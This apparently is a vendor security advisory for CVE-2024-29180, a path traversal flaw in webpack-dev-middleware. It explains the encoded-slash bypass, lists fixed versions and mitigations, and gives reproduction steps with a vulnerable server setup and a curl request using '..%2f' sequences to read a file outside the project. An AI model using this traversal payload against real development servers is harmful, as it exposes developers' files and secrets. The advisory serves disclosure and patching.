CVE-2024-29180

Path Traversal
Affects
Webpack Dev Middleware
<5.3.4, >=6.0.0 <6.1.2, >=7.0.0 <7.1.0
in
Web Essentials
Patch Available

This vulnerability has been fixed in the Never-Ending Support (NES) version offered by HeroDevs.

Overview

webpack-dev-middleware is an Express-style development middleware for use with webpack bundles: it serves the files emitted by webpack (by default from an in-memory file system) so that a browser can fetch them while the project is being developed.

A Path Traversal vulnerability (CVE-2024-29180) has been identified in webpack-dev-middleware. An attacker who can reach the development server can supply crafted URLs that cause the middleware to read files outside the webpack output directory, giving read access to any file the server process can read on the developer's machine.

Per OWASP: A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files.

This issue affects several versions of webpack-dev-middleware.

Details

Vulnerability Info

This High-severity vulnerability is found in several versions of webpack-dev-middleware.

webpack-dev-middleware uses its getFilenameFromUrl method to parse a requested URL and build the local file path to serve. The request URL is not unescaped and normalized before the middleware works on it, so percent-encoded dot and slash sequences (%2e and %2f) are not recognized as "../" while the path is being built and escape the normalization that a literal "../" would receive. A request such as /..%2f..%2fsecret.txt can therefore resolve to a file outside the webpack output directory.

Once the project is started, an attacker who can reach the development server can read any file the server process can read and exfiltrate its contents. Two delivery paths exist:

  • If the development server listens on a public IP address (or 0.0.0.0), an attacker on the same network can connect to the port directly and read local files without any interaction from the victim.
  • If the server allows access from third-party origins, an attacker can send the victim a malicious link; when it is visited, client-side script on that page connects to the local server and exfiltrates the files.

Starting with the fixed versions 7.1.0, 6.1.2, and 5.3.4, the URL is unescaped and normalized before any further processing.

Steps To Reproduce

1. Using Node v22, create a new project with the following dependencies

 "devDependencies": {
    "express": "^4.21.2",
    "webpack": "^4.47.0",
    "webpack-cli": "^3.3.12",
    "webpack-dev-middleware": "^3.7.3"
  }

2. Add a server.js file (the code below is CommonJS and is started with node server.js in step 6) and configure it to use webpack-dev-middleware:

const fs = require('fs');
const path = require('path');
const { join } = path;

const express = require('express');
const webpack = require('webpack');
const webpackDevMiddleware = require('webpack-dev-middleware');

const config = require('./webpack.config.js');

const app = express();
const port = 8080;

const compiler = webpack(config);

app.use(
  webpackDevMiddleware(compiler, {
    // Overwrite the file system implementation to use a non-in-memory one.
    // (see https://webpack.js.org/api/node/#custom-file-systems).
    fs: Object.assign(fs, {
      join,
      mkdirp(path, options, callback) {
        if (typeof options !== 'object') {
          callback = options;
          options = {};
        }

        return this.mkdir(path, { ...options, recursive: true }, callback);
      },
    }),
    publicPath: '/',
  })
);

// With no host argument, listen() binds every interface (:: or 0.0.0.0), so
// this PoC server is reachable from the network, not only from localhost.
app.listen(port, () => {
  console.log(`Example app listening at http://localhost:${port}`);
});

3. Add an empty src/index.js file to the project

4. Add a webpack.config.js to the project with the following settings:

const path = require('path');

module.exports = {
  mode: 'development',
  entry: {
    app: './src/index.js',
  },
  output: {
    filename: '[name].bundle.js',
    path: path.resolve(__dirname, 'dist'),
    publicPath: '/',
  },
};

5. (Optional) Create a target file for the traversal one directory above the project: cd .. && touch password.txt && echo "SuperSecretPassword" > password.txt

6. Start the node server: node server.js

7. Send a request that steps outside the project directory: curl localhost:8080/..%2f..%2fpassword.txt. The encoded form matters: curl collapses a literal ../ in the request path before sending it (unless --path-as-is is given) but leaves %2f alone, so the traversal reaches the server intact. The response shows that content from outside the project directory has been read:

SuperSecretPassword

A full reproduction with code similar to the above can be found here:

Path Traversal vulnerability POC

Credits

  • palirichtarik (finder)

Mitigation

Version 3 of webpack-dev-middleware has not received any updates to address this issue. For more information see this discussion.

Users of the affected components should apply one of the following mitigations:

  • Migrate affected applications away from the affected versions of webpack-dev-middleware: upgrade to 5.3.4, 6.1.2 or 7.1.0 (or later on the same major line). Projects still on version 3 have no fixed release on that line and must move to a supported major.
  • Leverage a commercial support partner like HeroDevs for post-EOL security support.

Until the upgrade lands, reduce exposure along the lines the vulnerability description implies: bind the development server to the loopback address rather than 0.0.0.0 or a public IP, and do not allow requests from third-party origins, since those are the two conditions under which an attacker can reach the middleware.

Vulnerability Details

ID: CVE-2024-29180
Project affected: Webpack Dev Middleware
Versions affected: <5.3.4, >=6.0.0 <6.1.2, >=7.0.0 <7.1.0
Published date: January 27, 2025
Approximate fix date: January 27, 2025
Severity: High
Category: Path Traversal